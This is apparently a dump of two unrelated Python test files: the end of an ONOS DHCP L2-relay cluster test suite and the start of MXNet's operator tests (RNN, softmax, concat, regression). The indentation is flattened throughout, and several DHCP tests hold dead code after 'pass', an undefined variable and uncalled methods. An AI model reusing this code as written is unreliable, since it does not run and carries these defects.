self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_removing_onos_instance_member(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load()
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_toggle_master_onos_instance_membership(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
self.cord_l2_relay_load()
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load()
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_toggle_standby_onos_instance_membership(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load()
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
self.cord_l2_relay_load()
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load()
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_adding_onos_instance_member(self, iface = 'veth0'):
pass
test_operator.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
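# Helper used by the RNN tests below: it binds the same unrolled computation for a
# fused RNN cell and an equivalent stack of per-layer cells, shares one set of
# parameters between them (via unpack_weights/pack_weights), and then checks that
# forward outputs and input gradients agree under the given grad_req setting.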
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if (type(grad_req) is dict and grad_req['data'] == 'null') or grad_req == 'null':
assert mod1.get_input_grads()[0] is None
assert mod2.get_input_grads()[0] is None
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
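# Reference softmax used by the tests below. Subtracting the per-axis maximum before
# exponentiating does not change the result but keeps exp() from overflowing, and the
# optional temperature simply rescales the logits.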
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
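# ElementWiseSum check: because the output is a plain sum of the inputs, the gradient
# of the output with respect to every input is the identity, so each input gradient is
# expected to equal the upstream out_grad (up to numerical tolerance).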
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
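# SoftmaxOutput fuses softmax with a cross-entropy loss, so its backward pass yields
# p - one_hot(label). The check below therefore asserts that grad_out minus the softmax
# probabilities equals a vector that is -1 at the label index and 0 elsewhere.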
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
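# With label smoothing (smooth_alpha), the target distribution puts (1 - alpha) on the
# true class and alpha/(K-1) on each of the other K-1 classes, which is exactly the
# expected_grad_out constructed below (negated, since grad = p - target).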
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
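# With use_ignore=True, samples whose label equals ignore_label contribute no gradient.
# The check below zeroes out the labels of the first half of the batch and verifies that
# the corresponding gradient rows vanish while the remaining rows are unchanged.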
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
